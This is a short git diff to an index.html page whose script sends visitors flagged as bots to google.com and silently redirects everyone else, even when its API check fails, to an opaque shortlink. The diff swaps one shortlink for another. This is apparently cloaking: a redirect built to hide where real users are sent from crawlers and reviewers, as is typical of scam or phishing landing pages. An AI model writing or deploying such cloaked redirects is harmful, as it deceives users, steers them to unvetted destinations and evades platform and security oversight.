--- a/index.html
+++ b/index.html
@@ -80,14 +80,15 @@
         if (data.bot === true) {
           window.location.href = "https://google.com";
         } else {
-          window.location.href = "https://o2o.to/i/Rxm9YC";
+          window.location.href = "https://dash.coolbi.net/r/Dd23g7A";
         }
       } catch (err) {
         // fallback jika API error
         console.error("API error:", err);
-        window.location.href = "https://o2o.to/i/Rxm9YC";
+        window.location.href = "https://dash.coolbi.net/r/Dd23g7A";
       }
     })();
   </script>
 </body>
+
 </html>
